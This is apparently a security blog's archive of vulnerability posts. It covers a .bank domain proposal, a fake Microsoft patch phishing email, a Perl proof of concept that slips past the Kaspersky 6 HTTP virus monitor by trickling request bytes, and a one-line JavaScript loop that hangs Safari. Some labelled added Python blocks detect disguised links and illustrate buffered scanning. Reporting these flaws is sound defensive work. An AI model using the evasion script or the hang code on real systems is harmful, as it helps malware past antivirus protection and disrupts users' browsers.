Archive for the 'Vulnerables' Category

Give banks the right to use .bank!

Friday, May 11th, 2007

And only banks: that is what Mikko Hyppönen, Chief Research Officer at F-Secure, announced a few days ago. If financial institutions are the only ones that can use a .bank TLD, the end of phishing could be near.

As we all know, a lot of phishing sites are exact copies of the original sites; only the domain name differs. So what does Mikko think? That using the .bank TLD will make people understand the difference? A lot of people trust their bank and are not smart enough to check the TLD.
And if we look a little further, what is going to stop a phisher from getting access to a subdomain? Of course Mikko has a point, but his solution is just not enough!
If we don't teach our kids, parents, grandpas and grandmas how to see the difference, the problem will not go away with a simple TLD!

On top of that, even if you are on the right site, you are not perfectly secure. Hackers showed us that a few weeks ago, when they cracked the text-message security of the Commonwealth Bank in Australia.

A new MS patch released, or not….

Tuesday, May 30th, 2006

It looks like there is a nasty email going around the net, telling people that a new Microsoft patch is available. But there isn't a new one.... The spammers are using the fact that MS Windows has had a lot of vulnerabilities in the past to tell people that another one has been found and a patch is available. When people click the link in the email it does NOT bring them to the URL shown (http://www.microsoft.com/patches-win-logon-critical/winlogon_patchV1.12.exe) but to a subdirectory on redcallao.com, which serves a bogus winlogon_patchV1.12.exe file. Only a few virus scanners detect it so far (ISC reports just 8 of them), so be warned!
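As an added example (not code from the original post), this Python check flags exactly the trick described above: an anchor whose visible text is a URL on one host while its href points somewhere else. The HTML mail body is constructed, and "lure-host.example" is a placeholder rather than the real host named in the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed phishing-style HTML: the visible URL names microsoft.com, the href does not.
# "lure-host.example" is a placeholder, not the host named in the post.
SAMPLE_EMAIL = """<html><body>
<p>A critical patch for Windows logon is available:</p>
<a href="http://lure-host.example/patches/winlogon_patchV1.12.exe">
http://www.microsoft.com/patches-win-logon-critical/winlogon_patchV1.12.exe</a>
<p>See also <a href="https://www.microsoft.com/security">Microsoft Security</a>.</p>
</body></html>"""


class LinkCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None        # href of the anchor currently open, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def host_of(url):
    """Lower-cased host of a URL; a bare 'www.example.com/x' is treated as http."""
    parsed = urlparse(url if "://" in url else "http://" + url)
    return (parsed.hostname or "").lower()

def find_disguised_links(html):
    """Return (visible text, href) pairs where the text is a URL on a different host than the href."""
    collector = LinkCollector()
    collector.feed(html)
    suspicious = []
    for href, text in collector.links:
        if text.lower().startswith(("http://", "https://", "www.")) and host_of(text) != host_of(href):
            suspicious.append((text, href))
    return suspicious
```

Links whose visible text is not a URL (such as "Microsoft Security") are not judged here; only a displayed URL that contradicts its own destination is reported.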

Kaspersky antivirus broken? No, they are not!

Tuesday, May 23rd, 2006

Update
See http://forum.kaspersky.com/index.php?s=dde13e274b2e7f67b43fe425ae8a0ecd&showtopic=14734&st=0&p=120857&#entry120857 for a reaction from KAV: it is not broken!

It looks like Kaspersky has made a small error in its HTTP monitor. In Kaspersky Anti-Virus 6 and Kaspersky Internet Security 6 it is possible to bypass the HTTP virus monitor because of HTTP parsing errors. john@[removespam]kak-sam.to has made some exploit code available:

This Perl script can be run with ActiveState Perl 5.8:

use IO::Socket::INET;
use strict;

# Target: the EICAR test file, which any working HTTP monitor should catch.
my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',
                                  'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,
                               PeerPort => $h_port,
                               Proto    => 'tcp' );
die "socket: $!" unless $s;

# Send the request headers one byte at a time (see sendone).
sendthem( $s,
          "GET $h_url HTTP/1.1",
          "Host: $h_srv",
          ""
    );
my $doc = read_body( $s, read_headers( $s ) );
syswrite STDOUT,
    'document is < '.$doc.'> len='.length($doc)."\n";

# Write each header line character by character, then CR LF.
sub sendthem {
    my $s = shift;
    my $c = 0;
    foreach( @_ ) {
        my @a = split //, $_;
        ++$c;
        syswrite STDOUT, "query $c: ";
        foreach( @a ) {
            sendone( $s, $_ );
        }
        sendone( $s, "\r" );
        sendone( $s, "\n" );
    }
}

# Send a single byte, echo it, then pause 300 ms before the next one.
sub sendone {
    my( $s, $v ) = @_;
    $s->syswrite( $v );
    syswrite STDOUT, $v;
# !!! comment next line to have monitoring working ;)
    select( undef, undef, undef, 0.300 );
}

# Read response headers up to the blank line; return Content-Length (0 if absent).
sub read_headers {
    my( $s ) = @_;
    my( $c, $cl ) = ( 0, 0 );
    for( ;; ) {
        my $l = read_line( $s );
        ++$c;
        syswrite STDOUT, "header $c: $l";
        syswrite STDOUT, "\r\n";
        last if not $l and $c;
        $cl = $1 if $l =~ /^Content-Length:\s+(\d+)/;
    }
    $cl;
}

# Read one line byte by byte, dropping CR and stopping at LF.
sub read_line {
    my( $s ) = @_;
    my $str = '';
    for( ;; ) {
        my $v = '';
        my $r = $s->sysread( $v, 1 );
        die 'EOF reading headers!' unless $r;
        last if $v eq "\n";
        next if $v eq "\r";
        $str .= $v;
    }
    return $str;
}

# Read the body: Content-Length bytes if known, otherwise until EOF.
sub read_body {
    my( $s, $cl ) = @_;
    my( $str, $cli ) = ( '', $cl );
    syswrite STDOUT, "reading body  ...\n";
    for( ;; ) {
        my $v = '';
        my $r = $s->sysread( $v, 1 );
        last unless $r;
        $str .= $v;
        --$cl if $cli;
        last if not $cl and $cli;
    }
    return $str;
}
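As an added defensive illustration (not code from the page or from the exploit's author), the following Python shows the design property a content monitor needs against this class of bypass: reassemble the whole HTTP message before scanning, so that byte-at-a-time delivery with pauses changes nothing. The signature marker and the HTTP response are constructed samples; a real monitor would match real signatures, such as the EICAR test file the script above fetches.

```python
# Constructed marker standing in for a real signature such as the EICAR test string.
TEST_SIGNATURE = b"CONSTRUCTED-MALWARE-TEST-MARKER"
# Constructed HTTP/1.1 response whose body is the marker.
SAMPLE_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n" % len(TEST_SIGNATURE) + TEST_SIGNATURE


class HttpResponseAssembler:
    """Buffers a response until the header block and all Content-Length body bytes have arrived."""

    def __init__(self):
        self._buf = bytearray()
        self.headers = None      # dict once the blank line ending the headers has been seen
        self.content_length = 0
        self.body = None         # bytes once the body is complete

    def feed(self, chunk):
        """Accept a chunk of any size, even one byte; return True once the message is complete."""
        self._buf.extend(chunk)
        if self.headers is None:
            end = self._buf.find(b"\r\n\r\n")
            if end < 0:
                return False     # end of headers not seen yet: keep buffering
            lines = bytes(self._buf[:end]).decode("latin-1").split("\r\n")
            del self._buf[:end + 4]
            self.headers = {}
            for line in lines[1:]:  # lines[0] is the status line
                name, _, value = line.partition(":")
                self.headers[name.strip().lower()] = value.strip()
            self.content_length = int(self.headers.get("content-length", "0"))
        if len(self._buf) >= self.content_length:
            self.body = bytes(self._buf[:self.content_length])
            return True
        return False

def trickle(data):
    """Split data into one-byte chunks, mirroring the script's per-byte sends."""
    return [data[i:i + 1] for i in range(len(data))]

def naive_per_chunk_scan(chunks):
    """Weak design: scan each chunk in isolation, so one-byte chunks can never match."""
    return any(TEST_SIGNATURE in c for c in chunks)

def buffered_scan(chunks):
    """Robust design: reassemble the message first, then scan the complete body once."""
    asm = HttpResponseAssembler()
    for c in chunks:
        if asm.feed(c):
            return TEST_SIGNATURE in asm.body
    return False                 # message incomplete: nothing is released to the scanner
```

The same trickled stream that defeats the per-chunk scanner is caught by the buffered one, because timing and chunking never reach the signature match.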

Safari’s kiss of death

Tuesday, May 23rd, 2006

Securiteam.com reports a bug in Safari that makes the famous SRCOD (Spinning Rainbow Cursor Of Death) appear. They report that Safari 2.0.3 (417.9.3) under Mac OS X 10.4.6 is vulnerable, but earlier versions may be vulnerable too. The PoC code looks like this:

for (;;);

Just put this between script tags in an HTML file and open it. The only solution they see right now is to disable JavaScript.
